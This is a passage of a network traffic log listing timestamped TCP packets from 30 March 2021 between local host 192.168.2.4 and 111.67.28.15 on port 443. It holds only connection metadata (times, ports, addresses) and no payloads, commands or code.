Mar 30, 2021 14:22:44.496630907 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.496649981 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.496668100 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.496675014 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.496701956 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.496726036 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.497191906 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.497212887 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.497241020 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.497272015 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.497335911 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.497349024 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.497359037 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.497380972 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.497390985 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.497428894 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.497446060 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.763526917 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.763567924 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.763595104 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.763690948 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.763720036 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.763746023 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.763744116 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.763773918 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.763780117 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.763786077 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.763801098 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.763819933 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.763828039 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.763853073 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.763854027 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.763875008 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.763897896 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.763917923 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.763938904 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.763958931 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.763984919 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.763998032 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764013052 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764039040 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764049053 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764065027 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764077902 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764092922 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764117002 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764126062 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764154911 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764154911 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764182091 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764192104 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764209032 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764211893 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764235973 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764238119 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764261961 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764264107 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764292002 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764292955 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764308929 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764309883 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764332056 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764364958 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764380932 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764389992 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764415979 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764425993 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764442921 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764456034 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764476061 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764488935 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764506102 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764530897 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764530897 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764558077 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764566898 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764585018 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764590979 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764611959 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764625072 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764637947 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764650106 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764666080 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764671087 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764698029 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764700890 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764723063 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764729023 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764758110 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764758110 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764780998 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764785051 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764812946 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764818907 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764838934 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764863968 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.764928102 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764957905 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.764982939 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.765005112 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.033076048 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.033109903 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.033133030 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.033153057 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.033171892 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.033193111 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.033204079 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.033217907 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.033240080 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.033246040 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.033251047 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.033267975 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.033298969 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037204027 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037226915 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037244081 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037256002 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037273884 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037290096 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037293911 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037305117 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037318945 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037323952 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037339926 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037352085 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037359953 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037373066 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037378073 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037404060 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037434101 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037448883 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037451029 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037467957 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037477016 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037484884 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037498951 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037502050 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037524939 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037530899 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037542105 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037553072 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037560940 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037580013 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037586927 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037597895 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037614107 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037621021 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037630081 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037642956 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037647009 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037668943 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037676096 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037688017 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037703037 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037708044 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037724972 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037728071 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037744999 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037755966 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037760973 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037776947 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037779093 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037795067 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037798882 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037811995 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037827015 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037833929 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037846088 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037853956 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037863970 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037879944 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037889004 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037894964 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037910938 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037930012 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037930965 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037942886 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037950039 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037960052 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037977934 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.037978888 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.037997007 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038005114 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.038012981 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038027048 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.038031101 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038048029 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038060904 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.038062096 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038079023 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038093090 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.038094044 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038115025 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038119078 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.038131952 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038141012 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.038150072 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038166046 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038172007 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.038181067 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038196087 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038203001 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.038213015 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038223028 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.038228989 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038249016 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038259983 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.038265944 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038283110 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038292885 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.038299084 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038315058 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038321018 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.038331032 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038343906 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.038351059 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038368940 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038377047 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.038388014 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038418055 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038427114 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.038435936 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038450003 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.038451910 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038469076 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038480997 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.038484097 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038501024 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038515091 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.038516045 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038536072 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038538933 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.038554907 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.038563967 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.038594961 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.302103996 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.302171946 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.302227974 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.302278996 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.302315950 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.302329063 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.302352905 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.302356958 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.302380085 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.302429914 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.302443981 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.302481890 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.302495956 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.302531958 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.302544117 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.302581072 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.302592993 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.302635908 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.302638054 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.302689075 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.302691936 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.302743912 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.307352066 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.307410002 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.307461977 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.307513952 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.307518005 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.307550907 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.307579041 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.307593107 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.307629108 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.307630062 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.307677984 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.307682991 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.307728052 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.307728052 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.307777882 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.307780027 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.307830095 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.307836056 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.307878017 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.307881117 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.307933092 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.307938099 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.307991028 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.307992935 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.308043003 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.308043957 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.308090925 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.308094025 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.308146000 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.308146954 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.308196068 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.308224916 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.308274984 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.308289051 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.308326960 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.308329105 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.308377028 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.308378935 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.308428049 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.308434010 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.308486938 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.308489084 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.308540106 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.308593988 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.308594942 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.308651924 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.308653116 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.308702946 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.308706999 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.308751106 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.308753014 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.308804989 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.308806896 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.308854103 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.308923006 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.308924913 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.308974981 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.308978081 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.309024096 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.309029102 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.309073925 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.309091091 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.309127092 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.309184074 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.309189081 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.309236050 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.309236050 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.309288025 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.309288025 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.309338093 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.309345961 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.309406042 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.309428930 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.309480906 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:45.309485912 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:45.309545040 CEST	443	49742	111.67.28.15	192.168.2.4
